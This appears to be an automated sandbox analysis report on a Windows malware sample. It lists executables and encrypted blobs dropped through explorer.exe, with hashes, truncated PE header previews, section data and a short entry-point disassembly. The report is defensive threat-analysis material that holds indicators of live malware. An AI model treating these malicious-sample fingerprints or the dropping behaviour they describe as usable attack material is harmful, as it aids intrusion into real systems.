                                                                                                                                  Preview:MDMP....... .......q4Nc....................................D....(..........T.......8...........T...........................................................................................................U...........B......h.......GenuineIntelW...........T...........]4Nc............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:modified
                                                                                                                                  Size (bytes):418816
                                                                                                                                  Entropy (8bit):6.905724524143702
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:o7qA7M1qVPQCssTSP+4eJmAON6qcgweh2QwbPqbYFt5y:ob7M1qVPQDX6ywPOE9y
                                                                                                                                  MD5:2D29421E985E4FB5F6ABB42FA3A502C1
                                                                                                                                  SHA1:0B9D7F7CAD88C5618C320B2603A5636891F4E80C
                                                                                                                                  SHA-256:DEDA980E424082BED5640A428A2024460B66BFA81EF168F317CBBEBBA0B8CB99
                                                                                                                                  SHA-512:E22392C93AF9B24F3EA276E3AB8EB9584A88794E6098376548B9BB18669B6024B5FA9FA7560EDD07F15F7E28FB37D1C4D62B7EDCEB1F259D30783D93482F5FBA
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R..O<D.O<D.O<D.$?E.O<D.$9E7O<D.$8E.O<D.$=E.O<D.O=D.O<D.58E.O<D.5?E.O<D.59E.O<D.55E.O<D.5>E.O<DRich.O<D................PE..L...~.Mc............... .*...D.......}.......@....@.......................................@.....................................(............................p..........................................@............@..8............................text...w).......*.................. ..`.rdata.......@......................@..@.data...8E... ...8..................@....reloc.......p.......F..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):753664
                                                                                                                                  Entropy (8bit):7.831987614297561
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:190wzR6RuBNzRZsmpwkhBWVfl17qukdXfg/EPYge+c4U+yLti:1uWou/PEYBs3Gu4Xfg/ENJUP0
                                                                                                                                  MD5:36FC2440660C5F4509C3ABCDDE9A1C3A
                                                                                                                                  SHA1:23B9D0FE11194E29394BEEDDDFD462225AF5118E
                                                                                                                                  SHA-256:78F55FD75A0E521099C5F29BC271195D0AC94FBD3A5332B022EAE4F0F304DF2D
                                                                                                                                  SHA-512:C77645C4FCC5C41129D6528D768919C0B470840417A49A0FB899E30740BAE25FF5819FAB37D765DB1A5B86406343B561A8E03AA0033CF44A0AFAE711D3F4F025
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Tv..:%..:%..:%...%..:%...%..:%..A%..:%..;%9.:%...%..:%...%..:%...%..:%Rich..:%................PE..L...z..`.....................z....................@..........................`!.................................................(.....!..K..........................................................@9..@...............(............................text............................... ..`.data... ........>..................@....rsrc....K....!..L...4..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):221696
                                                                                                                                  Entropy (8bit):6.956307856034634
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:odA5Hwr1mBa2jIvgLL3APaN4Ii+WCF4BmbnXoLnkzzsPyVSl7obwqxKDYow:oi5Qd2k2L3ACN4I+Bsinmzs+WywqED
                                                                                                                                  MD5:BD0DFD6CBAE2B012D4A5F155D10ED054
                                                                                                                                  SHA1:83A8CB5B61FCAFBDFD9BFF2B0CC8C8C39F5437AD
                                                                                                                                  SHA-256:BD2433BEDDEFCCCA8BF3539FC8E5A354E988CD2A3C3AF9A27F4A3BBE4ED40731
                                                                                                                                  SHA-512:01FBC67A42B43FA7EE6E1816D44D9BD1A40672AE814F1756C79D0F7CCC2198DCC109719AF85ED887B337DF5E48504402958EE15A6420EC01533584B545E32C7E
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Tv..:%..:%..:%...%..:%...%..:%..A%..:%..;%..:%...%..:%...%..:%...%..:%Rich..:%........PE..L...:QKa.....................X....................@..........................0......<.......................................|...(........K..........................................................09..@............................................text............................... ..`.data...@........"..................@....rsrc....K.......L..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):49152
                                                                                                                                  Entropy (8bit):0.7876734657715041
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                                  MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                                  SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                                  SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                  SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):223744
                                                                                                                                  Entropy (8bit):6.9681097133871965
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:XbAdHw+1mHfu461Pg4LBMpComz+CFnEHa1c6s1iVs61k9mzadH71jZ+eEoql+cb:XUdliuR1RLBOCo/FcU9mzgb1jZ+/l+
                                                                                                                                  MD5:D878530A6E5C388668853A620D1B6E05
                                                                                                                                  SHA1:5B2E2C6B4B2961A7576E85E746F5F92BA6B59063
                                                                                                                                  SHA-256:266F0DD2D6D365F8A75D5740FCBEDA3A95827C024A5E82136DCAD622F54385FC
                                                                                                                                  SHA-512:2B1D1604356C3B922B124EA30A14892D00E847E349052577AA29ED5BD110FFB82C3BC9596215580567BE7503855915069206A67E70670F17CF8335143909899A
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Tv..:%..:%..:%...%..:%...%..:%..A%..:%..;%..:%...%..:%...%..:%...%..:%Rich..:%........PE..L....l.a.....................^....................@..........................@...... .......................................|...(........K..........................................................09..@............................................text............................... ..`.data............*..................@....rsrc....K.......L..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):354304
                                                                                                                                  Entropy (8bit):6.972522186856824
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:Yu+08mgVzelSoAcx+semmAOkrWsaeFN+liI/D0FXLzC8LYP4dJ+mZy:YA8mgVzelkmCsaeoijt/CWYP4dJ+sy
                                                                                                                                  MD5:3A26E150EA47AD36BFF254227086F2D6
                                                                                                                                  SHA1:70984C8CB10C99FD22C65BAFA64AB574D1AB3270
                                                                                                                                  SHA-256:BDEE2F20451B6F0CAECEC651AE8C8230E72445353E523B27305142452BE057E6
                                                                                                                                  SHA-512:9151B2F5D94E350F6EBCA5EB07E366B0D18C90492D54A3832F70D323ACEEED32D6D31EFC784E8E6D61815BEA7EAAF3179357B1E68266DDBECE810F26FB5467B0
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R..O<D.O<D.O<D.$?E.O<D.$9E7O<D.$8E.O<D.$=E.O<D.O=D.O<D.58E.O<D.5?E.O<D.59E.O<D.55E.O<D.5>E.O<DRich.O<D................PE..L...U.Mc............... .*...H.......}.......@....@.......................................@.....................................(............................p..........................................@............@..8............................text...w).......*.................. ..`.rdata.......@......................@..@.data...@I... ...<..................@....reloc.......p.......J..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):223744
                                                                                                                                  Entropy (8bit):6.9681097133871965
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:XbAdHw+1mHfu461Pg4LBMpComz+CFnEHa1c6s1iVs61k9mzadH71jZ+eEoql+cb:XUdliuR1RLBOCo/FcU9mzgb1jZ+/l+
                                                                                                                                  MD5:D878530A6E5C388668853A620D1B6E05
                                                                                                                                  SHA1:5B2E2C6B4B2961A7576E85E746F5F92BA6B59063
                                                                                                                                  SHA-256:266F0DD2D6D365F8A75D5740FCBEDA3A95827C024A5E82136DCAD622F54385FC
                                                                                                                                  SHA-512:2B1D1604356C3B922B124EA30A14892D00E847E349052577AA29ED5BD110FFB82C3BC9596215580567BE7503855915069206A67E70670F17CF8335143909899A
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Tv..:%..:%..:%...%..:%...%..:%..A%..:%..;%..:%...%..:%...%..:%...%..:%Rich..:%........PE..L....l.a.....................^....................@..........................@...... .......................................|...(........K..........................................................09..@............................................text............................... ..`.data............*..................@....rsrc....K.......L..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3633152
                                                                                                                                  Entropy (8bit):7.795279381343742
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:98304:BExqImDF2tR+HngGnD35oiKx3Qnf1tNkTXaKaCmYkuBzM:wqY+HgGnD35o78NWKZuBzM
                                                                                                                                  MD5:D30C815C9E13D428430F2A8B4018D3D5
                                                                                                                                  SHA1:49BFDFA3B51BEFED67FE058D1A9E9CC7D1FEA579
                                                                                                                                  SHA-256:2A1E2D1A6BADFD7B0C914CE0554786FEA79E32DEAA0FF77D8DC703E8EEDD2A9F
                                                                                                                                  SHA-512:D6D12E13524E676463C230A7D9B620523550CEC37CFF7E7CA560670FCA86C68EB4E190E2C0C4301E436AE8DBD86038453B4D70140EFF5A751E52A165C6D2A3C5
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....gMc..........#......"..........X.)........@..............................`........... ...................................................L..............R`.P.............................................).0....Q`.0............ G..............................text....!.......................... ..`.rdata......@......................@..@.data..............................@....pdata..H...........................@..@_RDATA..............................@..@.vmp0....F... ......................`..`.vmp1....k7..p)..l7.................`..h........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):28672
                                                                                                                                  Entropy (8bit):0.4393511334109407
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
                                                                                                                                  MD5:8C31C5487A97BBE73711C5E20600C1F6
                                                                                                                                  SHA1:D4D6B04226D8FFC894749B3963E7DB7068D6D773
                                                                                                                                  SHA-256:A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
                                                                                                                                  SHA-512:394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):94208
                                                                                                                                  Entropy (8bit):1.287139506398081
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                                                                                  MD5:292F98D765C8712910776C89ADDE2311
                                                                                                                                  SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                                                                                  SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                                                                                  SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):248887
                                                                                                                                  Entropy (8bit):7.999285782902131
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:6144:3LBy5KggJHsYnWLCSyFSvycqW775svTawAG9NmDuzoBX+:3t0KPHLLSWS6E79wRNsy6X+
                                                                                                                                  MD5:8B6465234B36FC259DE12E2B10C498AF
                                                                                                                                  SHA1:2E0C29A9FA417E4589C26DFFD7AD7427951F6C1C
                                                                                                                                  SHA-256:3A2EA29BAEC810BCCE49203707627DF24EE0F4D5CA9093451B2ED3ABF79817C7
                                                                                                                                  SHA-512:F606B133EB27280AF69F1CB4F2F67517826A5634370917AB623755F395709928717326F16387AD593A2298C1FD0C23AADD6E6E888830A0BE43DDC801CB26E4A1
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:.W..G.$.|...y.4<.R..P-&.\..,.bC|=.,X.x....0.-L$...gJ.~.."Z...'5...&.6......=...?B...f`.6Q..W..(....a%...+h.Wt|.".zoum....E....~F..V3....4.m.}/oZ..W.^..Z....G.CV..Iodv...P..%....@..).Bp..6..D..]....t.._@8@.eB...J..).gWl.8`).$.D...>*EA3K...*{cI.dNL..F...%-..#.3m......H"&..J0...VY.."......Fh..>.v.....!d.d0]6...+L....Q..~|...i....9....^.....s:zd...c....A=...8..^b..z...........em/8OE.|H.sQ.m.F.......Vg._.K......F]'$.Y.C.SM2../v..S.tQ.d......_..(-...AAW.O?..4Y....M..#Y.\@.mZ6...S..y`C/#C;b...;]....Ny`R...s......j./%..29..5.M.....Mc.{2./.Sr.......S..1.'E.WXg..(...B.4m.l.2.j.`...K:...<..]....!......Z..v...."9...Cz.........I.N.P....oC..W._Sl..Fm.>9....j....~..w\.$6|?.pkz..p.V..RR[..2|.ya..|.6.$......,.J....k.w\.|t}.. .....X.!>5..J..9........f:..H6.c.).E..1.O|[dxT..W..dv..2..UR........4.../...-..u. ..)|J.dS..N\1".@.....<..h.oD%.........CE.b.F..e.]W(.......;._L.p.o\.7..../.;R....q..m....F.'._d.+.H{dz..o._.........b......-.Dk.M..9..`..w;.Y..
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):160970
                                                                                                                                  Entropy (8bit):7.9988713701377545
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:3072:4AMFkVHwvRo9yPxoiole3r9PsMFGcxC9s1HiEc4lINsB0W:Zgkq+901rbxC9GHiZyqW
                                                                                                                                  MD5:94346B0AAD5787E1B558F9E33272F4C2
                                                                                                                                  SHA1:E9B6DAFC38365F7BB985AC0191BA579CF394F649
                                                                                                                                  SHA-256:FFC5A52C1862B58C3536C360A0723EA7B3647508D60B8DA6030B810268F8A15E
                                                                                                                                  SHA-512:F34B9443A9B031E0AC25ED9E719FEC269A53B3D4B3871C9617B9DE5924C303BD61FFC9E312A7BB153F39A0338BC5789B024E53A308B2DF85411A03D6564247D3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:F........i@......mZ....`r.E.L..0&.G....D....|..?..S<.5...'<.d.)....o..............G.....E=...F..g.x^z...=....D..IdW>.....b=L.B4y.+.$..$:..c8...Y.#...1...Q.,.R.^1...,.>.4H...i.....P.q.....#~...t0{H..>.y.v6M.Y...........g.z;.[..w..<....3..~1......e.....S8.yz......YA.|J.........[.G+.[.w..pU..(...n...$.BL6...G5...LF...lK.r...n.s....~...}...%.;.C$.Y4p:n62l..aD=s".....$=.<.#.!..DYAeE..K...._.l.5...cm<.\,.......O.[+...R.:...cDc...h.T...C.Z.w.O.|...(...;........6...B.mM...^{.;.sA..........j./.|.QD..y..T-....7Ko...p.P...C..\..v<...~..2'h..&iLL.c.P1..d....H6....%$.k.........,.x......B....D.4.F.)y...B.Bg-....!......6....#i....I.....~.o.G..sB.K..Jgc....yC:..I........e.#.N..]...D./#....Q...>.k40(.....A.;......!T/.H....S..+...$>...IX.=S:...i...\.D5..s..g.+KD..Hpj.(...e.z.V.V..........c....$..Y..'...k.ZQK~.5Z......G.J.w...Y..g..k.....*x..'>.0j.3CB.......D..>.m...2.M.(F...)...^G.(.,.8@...}.....<O..4....+.JY<.....^m.B....Sd{.o..Y%.w../F.=...=~.c
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):221696
                                                                                                                                  Entropy (8bit):6.956307856034634
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:odA5Hwr1mBa2jIvgLL3APaN4Ii+WCF4BmbnXoLnkzzsPyVSl7obwqxKDYow:oi5Qd2k2L3ACN4I+Bsinmzs+WywqED
                                                                                                                                  MD5:BD0DFD6CBAE2B012D4A5F155D10ED054
                                                                                                                                  SHA1:83A8CB5B61FCAFBDFD9BFF2B0CC8C8C39F5437AD
                                                                                                                                  SHA-256:BD2433BEDDEFCCCA8BF3539FC8E5A354E988CD2A3C3AF9A27F4A3BBE4ED40731
                                                                                                                                  SHA-512:01FBC67A42B43FA7EE6E1816D44D9BD1A40672AE814F1756C79D0F7CCC2198DCC109719AF85ED887B337DF5E48504402958EE15A6420EC01533584B545E32C7E
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Tv..:%..:%..:%...%..:%...%..:%..A%..:%..;%..:%...%..:%...%..:%...%..:%Rich..:%........PE..L...:QKa.....................X....................@..........................0......<.......................................|...(........K..........................................................09..@............................................text............................... ..`.data...@........"..................@....rsrc....K.......L..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):222208
                                                                                                                                  Entropy (8bit):6.961464277141477
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:3mAwHwNRmc8MwxD4wuLt+oNk0A8CFoEkOREcn5R254FNdaQFPUZrNFUuK:31wKwMK0LtJNkJnRE0ZFOQFPUZ5FU
                                                                                                                                  MD5:644232606A176287A73169B177EB8752
                                                                                                                                  SHA1:0A09865B7C29D4A90F7F06AF19940580AC7E8847
                                                                                                                                  SHA-256:365904FA34452030915B29FCBF60978159E63A6240622FFD72B6D564A591BAD4
                                                                                                                                  SHA-512:D31F22B521CE18B2E15F6C955A4516392915028534DC3061C1FAF06D3F011A7984882BF10DF81B7EA23F902DCEADF8E8A7194107E423739D8809ED6D52355B47
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Tv..:%..:%..:%...%..:%...%..:%..A%..:%..;%..:%...%..:%...%..:%...%..:%Rich..:%........PE..L.....`.....................X....................@..........................0.......]......................................|...(........K..........................................................09..@............................................text............................... ..`.data............$..................@....rsrc....K.......L..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:Unknown
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):26
                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\4316.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):10
                                                                                                                                  Entropy (8bit):1.6854752972273346
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:8UVVPn:8UX
                                                                                                                                  MD5:6AE945FBDC1D8D49E8594EB1B17C432B
                                                                                                                                  SHA1:2C1F954F2B1DF2F1AAF8005712713310EF007910
                                                                                                                                  SHA-256:8832E50601FD9EAAE5C32CA2E9701E9DBCAFC504D4057A1E61B252E121660938
                                                                                                                                  SHA-512:6BD303C85FB735FD7635D11B9E24AB1943EBC1A60BC8DE77CBBFA8709BEBFF7E9EA5E229D92F1038724297156DE1B3976E4B6097DC607CA3657DC3111CEB8125
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:a010001012
                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Entropy (8bit):6.961464277141477
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:file.exe
                                                                                                                                  File size:222208
                                                                                                                                  MD5:644232606a176287a73169b177eb8752
                                                                                                                                  SHA1:0a09865b7c29d4a90f7f06af19940580ac7e8847
                                                                                                                                  SHA256:365904fa34452030915b29fcbf60978159e63a6240622ffd72b6d564a591bad4
                                                                                                                                  SHA512:d31f22b521ce18b2e15f6c955a4516392915028534dc3061c1faf06d3f011a7984882bf10df81b7ea23f902dceadf8e8a7194107e423739d8809ed6d52355b47
                                                                                                                                  SSDEEP:3072:3mAwHwNRmc8MwxD4wuLt+oNk0A8CFoEkOREcn5R254FNdaQFPUZrNFUuK:31wKwMK0LtJNkJnRE0ZFOQFPUZ5FU
                                                                                                                                  TLSH:D724DF2236C0C072D22617748D61DBF4AEBBB87119756A8B7BC8077C8F752D2EE25346
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Tv..:%..:%..:%...%..:%...%..:%..A%..:%..;%..:%...%..:%...%..:%...%..:%Rich..:%........PE..L......`.....................X.....
                                                                                                                                  Icon Hash:aecaae9ecea62aa2
                                                                                                                                  Entrypoint:0x40a106
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x60ACCECD [Tue May 25 10:17:49 2021 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:5
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:5
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:5
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:9111c2b05e717afa2acabbf314a51e79
                                                                                                                                  Instruction
                                                                                                                                  call 00007F36886FD714h
                                                                                                                                  jmp 00007F36886F58BEh
                                                                                                                                  mov edi, edi
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                                                  test eax, eax
                                                                                                                                  je 00007F36886F5A54h
                                                                                                                                  sub eax, 08h
                                                                                                                                  cmp dword ptr [eax], 0000DDDDh
                                                                                                                                  jne 00007F36886F5A49h
                                                                                                                                  push eax
                                                                                                                                  call 00007F36886F51B2h
                                                                                                                                  pop ecx
                                                                                                                                  pop ebp
                                                                                                                                  ret
                                                                                                                                  mov edi, edi
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                                                  push esi
                                                                                                                                  mov esi, ecx
                                                                                                                                  mov byte ptr [esi+0Ch], 00000000h
                                                                                                                                  test eax, eax
                                                                                                                                  jne 00007F36886F5AA5h
                                                                                                                                  call 00007F36886F93A9h
                                                                                                                                  mov dword ptr [esi+08h], eax
                                                                                                                                  mov ecx, dword ptr [eax+6Ch]
                                                                                                                                  mov dword ptr [esi], ecx
                                                                                                                                  mov ecx, dword ptr [eax+68h]
                                                                                                                                  mov dword ptr [esi+04h], ecx
                                                                                                                                  mov ecx, dword ptr [esi]
                                                                                                                                  cmp ecx, dword ptr [004313B0h]
                                                                                                                                  je 00007F36886F5A54h
                                                                                                                                  mov ecx, dword ptr [004312C8h]
                                                                                                                                  test dword ptr [eax+70h], ecx
                                                                                                                                  jne 00007F36886F5A49h
                                                                                                                                  call 00007F36886F6F61h
                                                                                                                                  mov dword ptr [esi], eax
                                                                                                                                  mov eax, dword ptr [esi+04h]
                                                                                                                                  cmp eax, dword ptr [00431BA8h]
                                                                                                                                  je 00007F36886F5A58h
                                                                                                                                  mov eax, dword ptr [esi+08h]
                                                                                                                                  mov ecx, dword ptr [004312C8h]
                                                                                                                                  test dword ptr [eax+70h], ecx
                                                                                                                                  jne 00007F36886F5A4Ah
                                                                                                                                  call 00007F36886FD94Bh
                                                                                                                                  mov dword ptr [esi+04h], eax
                                                                                                                                  mov eax, dword ptr [esi+08h]
                                                                                                                                  test byte ptr [eax+70h], 00000002h
                                                                                                                                  jne 00007F36886F5A56h
                                                                                                                                  or dword ptr [eax+70h], 02h
                                                                                                                                  mov byte ptr [esi+0Ch], 00000001h
                                                                                                                                  jmp 00007F36886F5A4Ch
                                                                                                                                  mov ecx, dword ptr [eax]
                                                                                                                                  mov dword ptr [esi], ecx
                                                                                                                                  mov eax, dword ptr [eax+04h]
                                                                                                                                  mov dword ptr [esi+04h], eax
                                                                                                                                  mov eax, esi
                                                                                                                                  pop esi
                                                                                                                                  pop ebp
                                                                                                                                  retn 0004h
                                                                                                                                  mov edi, edi
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  sub esp, 14h
                                                                                                                                  mov eax, dword ptr [00431178h]
                                                                                                                                  xor eax, ebp
                                                                                                                                  mov dword ptr [ebp-04h], eax
                                                                                                                                  push ebx
                                                                                                                                  push esi
                                                                                                                                  xor ebx, ebx
                                                                                                                                  Programming Language:
                                                                                                                                  • [ASM] VS2008 build 21022
                                                                                                                                  • [ C ] VS2008 build 21022
                                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                                  • [C++] VS2008 build 21022
                                                                                                                                  • [RES] VS2008 build 21022
                                                                                                                                  • [LNK] VS2008 build 21022
                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1f37c0x28.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x18e0000x4bd8.rsrc
